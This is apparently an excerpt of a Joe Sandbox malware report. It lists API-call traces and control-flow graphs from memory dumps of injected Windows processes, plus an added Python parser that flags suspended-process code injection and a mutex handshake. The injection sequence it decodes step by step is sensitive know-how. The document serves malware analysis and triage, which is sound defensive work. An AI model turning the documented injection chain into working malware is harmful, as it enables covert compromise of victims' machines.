• Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,023A29C1), ref: 023A29D0
  • Part of subcall function 023A2A01: lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
  • Part of subcall function 023A2A01: lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
  • Part of subcall function 023A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
  • Part of subcall function 023A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: 214cb71808e54b0b099ed5c916c80f383bf560b138c81c03cc5c00997d2c0982
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: 3B4131719052589EDB32AF708D58EAF77BDEF40704F4044B5AE86EA051EE359A80CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 847 1c2a71-1c2a86 call 1c26f9 844->847 850 1c2ade-1c2af5 call 1c2683 845->850 851 1c2ab3 845->851 847->845 855 1c2a88 847->855 860 1c2af8-1c2b11 call 1c2e97 850->860 861 1c2af7 850->861 851->850 853 1c2ab5-1c2aca call 1c26f9 851->853 853->850 862 1c2acc 853->862 855->845 856 1c2a8a-1c2a94 DeleteFileA 855->856 856->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->850 865 1c2ace-1c2ad8 DeleteFileA 862->865 865->850 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
APIs
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%
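Two call patterns recur in the function blocks above. The first (blocks 1C09F9 and 23A09FD) is a suspended-process code injection recorded call by call: CreateProcessA, GetThreadContext on the new thread, VirtualProtectEx of a 0xEB-byte range to 0x40 (PAGE_EXECUTE_READWRITE), WriteProcessMemory of the same 0xEB bytes, ResumeThread, and then a loop of Sleep(0x3E8 = 1000 ms) and OpenMutexA(0x1F0001 = MUTEX_ALL_ACCESS), which is the parent polling for a mutex the injected code is expected to create. The DuplicateHandle call between them uses dwOptions 0x2 (DUPLICATE_SAME_ACCESS), so a handle is copied into the child before it is resumed. The second pattern (blocks 1C29A6, 23A29C5, 1C29DD and 23A2A01) builds paths with lstrcat, calls DeleteFileA up to three times, and sleeps 0xA012C = 655660 ms (about eleven minutes) before looping back. Note that the report prints raw stack dwords past a call's real parameter count (CreateProcessA shows 13 values for a 10-parameter function), so only the leading argument slots of short calls can be decoded with confidence; creation flags are not read from the listing for that reason. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API lines in the report's own format, decodes the unambiguous size and flag slots using the documented Win32 constants, and flags the injection chain and the resume-then-poll handshake. The two sample blocks are the listings copied from this page; the chain names (INJECTION_CHAIN, HANDSHAKE_CHAIN) and the rule of trusting only leading slots are choices made for this example.

```python
# Added example (not Joe Sandbox or sample code): parse the "APIs" lines of the
# function blocks above and decode the injection pattern they record.
import re
from dataclasses import dataclass
# One "APIs" line, with or without the "Part of subcall function XXXX:" callee prefix.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# winnt.h / winbase.h constants for the argument slots decoded below.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MUTEX_ALL_ACCESS = 0x1F0001
DUPLICATE_SAME_ACCESS = 0x2

# Call orders looked for (pattern names chosen here, not terms from the report).
INJECTION_CHAIN = ("CreateProcess", "GetThreadContext", "VirtualProtectEx",
                   "WriteProcessMemory", "ResumeThread")
HANDSHAKE_CHAIN = ("ResumeThread", "Sleep", "OpenMutex")
# Sample input: the listings of blocks 23A09FD and 1C29A6, copied from this report.
INJECT_BLOCK = """\
• CreateProcessA.KERNEL32(00000000,023A09F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 023A0A04
• GetThreadContext.KERNEL32(?,00000000), ref: 023A0A2C
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 023A0A57
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,023A5834,00000000,00000000,00000002), ref: 023A0A9C
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 023A0ACA
• ResumeThread.KERNEL32(?), ref: 023A0ADA
• Sleep.KERNEL32(000003E8), ref: 023A0AEA
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023A0B01
"""
CLEANUP_BLOCK = """\
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
"""

@dataclass
class Call:
    name: str
    args: list      # one int per printed dword, None where the report shows '?'
    ref: int        # call-site address in the dump
    subcall: bool   # True for lines inherited from a callee

def parse_api_lines(text):
    """Return the calls in listing order, which is call-site order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [None if a.strip() == "?" else int(a, 16)
                    for a in m["args"].split(",") if a.strip()]
            calls.append(Call(m["name"], args, int(m["ref"], 16), "Part of subcall" in line))
    return calls

def decode_call(c):
    """Name the unambiguous size/flag slots; only leading slots of short calls are trusted."""
    arg = lambda i: c.args[i] if i < len(c.args) else None
    if c.name == "VirtualProtectEx" and arg(3) is not None:
        return f"{arg(2)} bytes -> {PAGE_PROTECT.get(arg(3), hex(arg(3)))}"
    if c.name == "WriteProcessMemory" and arg(3) is not None:
        return f"writes {arg(3)} bytes into the target process"
    if c.name == "DuplicateHandle" and arg(6) == DUPLICATE_SAME_ACCESS:
        return "DUPLICATE_SAME_ACCESS: a handle is copied into another process"
    if c.name.startswith("OpenMutex") and arg(0) == MUTEX_ALL_ACCESS:
        return "MUTEX_ALL_ACCESS"
    if c.name == "Sleep" and arg(0) is not None:
        return f"{arg(0)} ms ({arg(0) / 1000:.1f} s)"
    return None

_base = lambda name: re.sub(r"[AW]$", "", name)   # CreateProcessA == CreateProcessW
def _in_order(names, chain):
    """True when every step of chain occurs in names, in that order."""
    pos = 0
    for step in chain:
        if step not in names[pos:]:
            return False
        pos = names.index(step, pos) + 1
    return True

def summarize(block):
    """Verdict for one function block: injection chain, handshake, payload size."""
    calls = parse_api_lines(block)
    own = [c for c in calls if not c.subcall]          # the function's own calls
    names = [_base(c.name) for c in own]
    by_name = {_base(c.name): c for c in own}
    protect, write = by_name.get("VirtualProtectEx"), by_name.get("WriteProcessMemory")
    written = write.args[3] if write and len(write.args) > 3 else None
    # Report the payload size only when the range made executable is the range written.
    same = protect is not None and len(protect.args) > 2 and protect.args[2] == written
    return {
        "injection": _in_order(names, INJECTION_CHAIN),
        "mutex_handshake": _in_order(names, HANDSHAKE_CHAIN),
        "payload_bytes": written if same else None,
        "decoded": {c.name: d for c in calls if (d := decode_call(c))},
    }
```

`summarize(INJECT_BLOCK)` returns injection and handshake true with a 235-byte payload; `summarize(CLEANUP_BLOCK)` returns neither and only decodes the 655660 ms sleep. The same parser can be pointed at the "APIs" lines of any other function block in this report; it is a triage aid over the listing, not a scanner for live process memory, and a chain match on a listing says nothing about which of those calls actually executed (the CFG's Executed/Not Executed marking does).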

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 871 23a2a01-23a2a3e call 23a3677 lstrcat call 23a2525 call 23a2a38 call 23a3677 lstrcat 881 23a2a44-23a2a67 call 23a2b71 call 23a351b 871->881 885 23a2a6c-23a2a73 881->885 885->881 886 23a2a75-23a2a91 call 23a3463 call 23a26a7 885->886 891 23a2abe-23a2ad5 call 23a26a7 886->891 892 23a2a93 886->892 898 23a2b02-23a2b19 call 23a26a7 891->898 899 23a2ad7 891->899 892->891 893 23a2a95-23a2aaa call 23a271d 892->893 893->891 901 23a2aac 893->901 906 23a2b1b 898->906 907 23a2b1c-23a2b35 call 23a2ebb 898->907 899->898 902 23a2ad9-23a2aee call 23a271d 899->902 901->891 904 23a2aae-23a2ab8 DeleteFileA 901->904 902->898 910 23a2af0 902->910 904->891 906->907 913 23a2b58-23a2b6c Sleep 907->913 914 23a2b37-23a2b40 call 23a307b 907->914 910->898 912 23a2af2-23a2afc DeleteFileA 910->912 912->898 913->885 914->913 917 23a2b42-23a2b52 DeleteFileA 914->917 917->913
APIs
• lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
  • Part of subcall function 023A2A38: lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
  • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
  • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
  • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
  • Part of subcall function 023A2A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: 9da0757af045d95e6db52a3ce6e47ad5f0962d2fb4c7b36bce32b4d4c4670bcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 164131715052589EDB32AF708D58FAF77BDEF40709F4044B5AE86EA051EE349A80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
                                                                                                                                                                                            • Part of subcall function 023A2B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 023A2C68
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 233f7c16acb58b24ad0c289a329ead04ef36ec8371ac91175a2a15474c24faff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71312F715052589EDB226F308D58FAF76BDEF40709F4044B5AE86EA054EF349A80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 023A320E
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 023A324C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023A31D9,00000011,?,00000000,00000000), ref: 023A3279
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023A31D9,00000011,?,00000000,00000000,00000000,023A3092,00000004,00000000), ref: 023A3285
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023A31D9,00000011,?,00000000,00000000,00000000,023A3092,00000004,00000000), ref: 023A3291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 3b5c067545e4d537ebcb4c57ca1ccf2902eb49ee1031da120822be50baffde4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1121724005189FDF12AB60CC98AAFB7FDEF40305F0145A9E986EB015DA309A90CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,023A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 023A3F51
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,023A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 023A3F6F
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 023A3F7F
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 023A3F8F
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
• Instruction ID: 24c299aca025a81fc44dc181c23e8d7712eca15c556d989953a75213f2cff8fb
• Instruction Fuzzy Hash: E8F01C705643509BFB603BB08C6D64A3AB9EF00704F0400F1AA89AE4A6CF7490508E75
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: HandleLibraryLoadModule
• String ID: j
• API String ID: 4133054770-2747090070
• Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
• Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
• Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000013.00000002.2885118334.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_580000_TextInputHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
• Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000014.00000002.2886762840.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3d0000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
• Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000017.00000002.2810281551.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
• Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000018.00000002.2886724253.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
• Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000018.00000002.2886724253.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
• Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 0000001A.00000002.2886442210.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
